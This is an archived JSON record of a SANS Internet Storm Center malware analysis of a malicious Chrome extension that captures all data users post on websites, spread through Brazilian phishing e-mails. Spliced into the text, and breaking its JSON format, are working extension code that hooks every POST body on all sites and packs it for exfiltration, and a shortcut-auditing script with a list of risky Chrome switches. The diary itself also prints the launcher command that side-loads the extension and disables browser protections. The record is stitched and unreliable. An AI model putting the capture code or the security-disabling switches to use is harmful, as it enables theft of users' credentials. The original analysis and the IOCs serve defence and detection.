{
	"id": "8ec51f31-6038-417d-b5f5-b54b921a3180",
	"created_at": "2026-04-06T00:12:15.914523Z",
	"updated_at": "2026-04-10T03:21:44.96927Z",
	"deleted_at": null,
	"sha1_hash": "90a86a68c57cd47b1d5ba1fcf4e20087eebfeb4d",
	"title": "\"Catch-All\" Google Chrome Malicious Extension Steals All Posted Data",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2274890,
	"plain_text": "\"Catch-All\" Google Chrome Malicious Extension Steals All Posted Data\r\nBy SANS Internet Storm Center\r\nArchived: 2026-04-05 20:49:47 UTC\r\n1. Introduction\r\nIt seems that malicious Google Chrome extensions are on the rise. A couple of months ago, I posted here about two of them [1][2] which stole user credentials posted on banking websites and the like. Now, while analyzing a phishing e-mail, I came across a new piece of malware with a slightly different approach: instead of monitoring specific URLs and focusing on credentials, it captures literally all data posted by the victim on any website, hence the name.\r\nIn today’s diary, I’ll detail the aspects of the “Catch-All” malware that caught my attention. Let’s start with the threat analysis diagram in Figure 1, followed by the text description in section 2.\r\nhttps://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/\r\nhttps://threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/\r\nFigure 1: “Catch-all” threat flow\r\n2. Threat analysis\r\nThis campaign’s infection vector is a phishing e-mail with links to photos supposedly taken over the weekend and sent through WhatsApp. The subject is in Portuguese: “Segue as (Fotos Final de Semana ) Enviadas via WhatsApp (30244)”, something like “See the (Weekend Photos) Sent via WhatsApp (30244)”.\r\nFollowing any “photo” link, the victim downloads the malware dropper file called “whatsapp.exe”. 
Once executed, “whatsapp.exe” presents a fake Adobe PDF Reader install screen, as seen in Figure 2, while it downloads, unpacks (the output is two files, md0 and md1) and executes a “.cab” file called “md18102136.cab”, as seen in Figure 3.\r\nFigure 2: Fake Adobe PDF Reader install screen\r\nFigure 3: Dropper downloading malware payload\r\nThe “md18102136.cab” file is a ~9.5 MB zip-compressed archive that, once extracted, yields two very large files of ~200 MB each, as shown in Figure 4.\r\nFigure 4: md18102136.cab content\r\nLooking at the content of those binaries, it was possible to see that just ~3% of each file is actual instructions, as seen in Figure 5. The rest is “NOP” padding that bloats the file, possibly as a strategy to bypass anti-malware solutions that usually do not inspect large files.\r\nFigure 5: Bloated binaries\r\nOnce executed, “md0” attempts to disable the Windows Firewall and kill all Google Chrome processes in order to install the malicious extension, as seen in Figure 6.\r\nFigure 6: Disabling the Firewall and Killing Google Chrome processes\r\nIt then extracts a Google Chrome extension from itself and changes the Google Chrome launcher (“.lnk”) files to load it on the next execution, as seen in Figure 7.\r\nFigure 7: Loading malicious extension\r\nThis is the 
content inserted by the malware into the “Target” field of the Google Chrome link file:\r\n\"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\"  --disable-extensions-file-access-check --always-authorize-plugins --disable-improved-download-protection --load-extension=\"C:\\Users\\<USER>\\AppData\\Local\\complemento\\E1EDEAE8EFE3E0EEE0DC2610495\r\nNote that --load-extension side-loads an unpacked extension directory without any Web Store involvement, and that, in addition to loading the extension, the remaining switches disable important security features that could prevent the malicious extension from working properly:\r\n--disable-extensions-file-access-check: disables the check for user opt-in for extensions that want to inject script into file URLs (i.e., always allows it). This switch is meant for automated testing.\r\n--always-authorize-plugins: prevents Chrome from requiring authorization to run certain widely installed but less commonly used plug-ins.\r\n--disable-improved-download-protection: disables improved SafeBrowsing download protection (downloaded files are not verified by the built-in protection).\r\n3. The malicious extension\r\nAfter deobfuscating the malicious extension’s JavaScript source code, it was possible to analyze how it captures and leaks all data posted by the victim on any website.\r\n
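Before walking through the figures, here is that capture path in working form. This is an added example written for this edit, not code recovered from the extension: the Manifest V2 webRequest API hands a listener every request together with its body, and a few lines turn that into the URL-encoded record the figures below show being handed to the exfiltration function. The function names (encodeRequestBody, buildCapture), the example.com hosts and the sample request objects are assumptions constructed for the illustration.

```javascript
// Added example (editor's illustration, not the Catch-All extension's own code):
// what a Manifest V2 extension receives from chrome.webRequest.onBeforeRequest
// when it asks for the 'requestBody' extra info, and how little work it takes to
// turn that into one URL-encoded record. Function names are assumed.

// Flatten details.requestBody into an application/x-www-form-urlencoded string.
// Chrome delivers form posts as formData (field name -> array of values) and
// every other content type (JSON, XML, ...) as raw byte chunks.
function encodeRequestBody(requestBody) {
  if (!requestBody) return '';
  if (requestBody.formData) {
    const pairs = [];
    for (const name of Object.keys(requestBody.formData)) {
      for (const value of requestBody.formData[name]) {
        pairs.push(encodeURIComponent(name) + '=' + encodeURIComponent(value));
      }
    }
    return pairs.join('&');
  }
  if (Array.isArray(requestBody.raw)) {
    const decoder = new TextDecoder('utf-8');
    return requestBody.raw
      .map((chunk) => (chunk.bytes ? decoder.decode(new Uint8Array(chunk.bytes)) : ''))
      .join('');
  }
  return '';
}

// The record the diary describes: URL and encoded body, URL-encoded again into
// a single query string that a 'savetofile'-style function would ship out.
function buildCapture(details) {
  const body = encodeRequestBody(details.requestBody);
  return {
    method: details.method,
    url: details.url,
    body: body,
    query: 'u=' + encodeURIComponent(details.url) + '&d=' + encodeURIComponent(body),
  };
}

// Constructed sample: the details object Chrome would pass for a login form POST.
const SAMPLE_FORM_POST = {
  method: 'POST',
  url: 'https://accounts.example.com/login?next=%2Finbox',
  requestBody: { formData: { user: ['alice'], passwd: ['S3cret pass!'] } },
};

// Constructed sample: a JSON body arrives as raw bytes, not as formData.
const SAMPLE_JSON_POST = {
  method: 'POST',
  url: 'https://api.example.com/v1/session',
  requestBody: {
    raw: [{ bytes: Uint8Array.from(new TextEncoder().encode(JSON.stringify({ user: 'alice', token: 't0k' }))).buffer }],
  },
};

// In a real MV2 background script this single registration is the whole hook:
// every request on every site, with its body, before it leaves the browser.
// Guarded so the file also runs outside Chrome (e.g. under node for the samples).
if (typeof chrome !== 'undefined' && chrome.webRequest) {
  chrome.webRequest.onBeforeRequest.addListener(
    (details) => { if (details.method === 'POST') buildCapture(details); },
    { urls: ['<all_urls>'] },
    ['requestBody']
  );
}

console.log(buildCapture(SAMPLE_FORM_POST));
console.log(buildCapture(SAMPLE_JSON_POST));
```

For a reviewer, the tell in an extension package is the combination of the webRequest permission, a host permission covering all URLs and a listener registered with requestBody; loaded through --load-extension, none of that triggers a permission prompt, which is the point the final words below make.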
Looking at Figure 8, it is possible to see that it encodes both the URL and the query string of the “requestBody” and hands them to a function called “savetofile”.\r\nFigure 8: Capturing “requestBody” content\r\nThe function “savetofile”, as seen in Figure 9, sends the captured data to a C&C server using jQuery ajax connections.\r\nFigure 9: Leaking “requestBody” content\r\nDebugging the extension while trying to log into Gmail, it was possible to see the content that would be sent to the C&C server, as shown in Figure 10.\r\nFigure 10: Data leaking\r\n4. Final words\r\nSo, using such an approach, an adversary is able to capture highly sensitive data with little effort compared to standard methods. It was not necessary for the attacker to lure the victim to a fake website with a doubtful SSL certificate or to deploy local proxies to intercept web connections. Quite the opposite: the user is accessing the original, legitimate websites and all interactions work properly while the data is captured and leaked. In other words, this method may subvert many of the security layers the victim has in place.\r\nAs I mentioned in previous related posts [1][2], it seems strange to me that Google Chrome allows extensions to access sensitive form fields, like passwords, without asking for additional user approval, and that it allows an extension to silently and autonomously establish a connection to an external entity.\r\n
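Hunting for the launcher tampering described in section 2 is the quickest way to catch this family on a host. The following script is an added check written for this edit, not part of the diary or of the malware: it tokenizes the Target string of a Chrome shortcut and flags the switches discussed above. The function names, the two extra switches beyond the ones the diary lists, and the sample Target (which reuses the path from section 2 with <USER> left as a placeholder) are assumptions.

```javascript
// Added example (editor's check, not from the diary): audit the Target of a
// Chrome shortcut for the switches used in this campaign. Names are assumed.
// The quote and backslash characters are assembled from char codes so the
// Windows paths can be written without escape sequences.
const DQ = String.fromCharCode(34);
const BS = String.fromCharCode(92);

// Switches worth flagging on a Chrome launcher, with the reason each matters.
// The first four are the ones the diary documents; the last two are added here
// as further switches that weaken the browser in the same way.
const RISKY_SWITCHES = {
  '--load-extension': 'side-loads an unpacked extension directory, bypassing the Web Store',
  '--disable-extensions-file-access-check': 'lets extensions inject script into file:// URLs without user opt-in',
  '--always-authorize-plugins': 'runs plug-ins without asking for authorization',
  '--disable-improved-download-protection': 'turns off SafeBrowsing download verification',
  '--disable-web-security': 'disables the same-origin policy',
  '--ignore-certificate-errors': 'accepts any TLS certificate',
};

// Minimal Windows-style tokenizer: split on spaces outside double quotes and
// drop the quotes themselves, so --load-extension=... keeps its full path.
function splitCommandLine(line) {
  const tokens = [];
  let current = '';
  let inQuote = false;
  let pending = false;
  for (const ch of line) {
    if (ch === DQ) { inQuote = !inQuote; pending = true; continue; }
    if (ch === ' ' && !inQuote) {
      if (pending) { tokens.push(current); current = ''; pending = false; }
      continue;
    }
    current += ch;
    pending = true;
  }
  if (pending) tokens.push(current);
  return tokens;
}

// Parse the Target string and report every risky switch plus the extension
// directories it side-loads (--load-extension takes a comma-separated list).
function auditChromeTarget(target) {
  const [executable, ...args] = splitCommandLine(target);
  const findings = [];
  const loadedExtensions = [];
  for (const arg of args) {
    const eq = arg.indexOf('=');
    const name = eq === -1 ? arg : arg.slice(0, eq);
    const value = eq === -1 ? '' : arg.slice(eq + 1);
    if (name === '--load-extension') {
      loadedExtensions.push(...value.split(',').filter((p) => p.length > 0));
    }
    if (Object.prototype.hasOwnProperty.call(RISKY_SWITCHES, name)) {
      findings.push({ name: name, value: value, reason: RISKY_SWITCHES[name] });
    }
  }
  return { executable, args, loadedExtensions, findings, suspicious: findings.length > 0 };
}

const CHROME_EXE = ['C:', 'Program Files (x86)', 'Google', 'Chrome', 'Application', 'chrome.exe'].join(BS);
const EXT_DIR = ['C:', 'Users', '<USER>', 'AppData', 'Local', 'complemento', 'E1EDEAE8EFE3E0EEE0DC2610495'].join(BS);

// Constructed samples: the tampered Target from the diary (two spaces after the
// executable, as in the original) and a normal one.
const TAMPERED_TARGET = [
  DQ + CHROME_EXE + DQ + '  --disable-extensions-file-access-check',
  '--always-authorize-plugins',
  '--disable-improved-download-protection',
  '--load-extension=' + DQ + EXT_DIR + DQ,
].join(' ');
const CLEAN_TARGET = DQ + CHROME_EXE + DQ + ' --profile-directory=Default';

console.log(auditChromeTarget(TAMPERED_TARGET));
console.log(auditChromeTarget(CLEAN_TARGET).suspicious);
```

On a Windows host, feed it the TargetPath and Arguments that WScript.Shell's CreateShortcut exposes for each Chrome .lnk (desktop, Start Menu and pinned taskbar shortcuts), joined with a space; in a running browser the same switches are visible on the Command Line row of chrome://version.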
Additionally, browser security features that could protect the user from harmful extensions can be disabled through command line arguments, as in this case. Should non-tech-savvy users be able to programmatically deploy rogue extensions? Comparing it to the Android or iOS ecosystems, it is like allowing users to easily deploy apps not offered by the official stores or another safe channel. What do you think?\r\n5. Indicators of Compromise (IOCs)\r\nFiles\r\nMD5 (md0) = 72c35311136adaaf2c31d54b7d2c462e\r\nMD5 (md1) = bbca1ced8eea1a63e4e05a7f7e368b69\r\nMD5 (whatsapp.exe) = 713fed252238d2cbd48a18b3faa67a8e\r\nExtension Files\r\nMD5 (btwjvx.js) = 229495556791239ecf88e883124284b7\r\nMD5 (ico.png) = 42ab831ae1520621f4117d3639b1131d\r\nMD5 (java_128.ico) = a5c5f16f314bb022edcdb084850f0d63\r\nMD5 (java_32.ico) = d7a6c3c105a0ab5dc39bdf5005f044b4\r\nMD5 (java_64.ico) = 748e901736d11413f8856f9db82e7328\r\nMD5 (manifest.json) = 214859fb1903fefb8c0142273953b4dc\r\nMD5 (unjjmwv.js) = 5ca7582261c421482436dfdf3af9bffe\r\nNetwork\r\nhxxps://storage.googleapis.com/webfotosb/Whatsapp.html\r\nhxxp://177.11.55.90/md18102136.cab\r\nhxxps://agenziapetra.com:1515/\r\nReferences\r\n[1] https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/\r\n[2] https://isc.sans.edu/forums/diary/Second+Google+Chrome+Extension+Banker+Malware+in+Two+Weeks/22766/\r\n--\r\nRenato Marinho\r\nMorphus Labs | LinkedIn | Twitter\r\nSource: 
https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/\r\nhttps://threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/",
		"https://threatpost.com/malicious-chrome-extension-steals-data-posted-to-any-website/128680/"
	],
	"report_names": [],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434335,
	"ts_updated_at": 1775791304,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/90a86a68c57cd47b1d5ba1fcf4e20087eebfeb4d.pdf",
		"text": "https://archive.orkl.eu/90a86a68c57cd47b1d5ba1fcf4e20087eebfeb4d.txt",
		"img": "https://archive.orkl.eu/90a86a68c57cd47b1d5ba1fcf4e20087eebfeb4d.jpg"
	}
}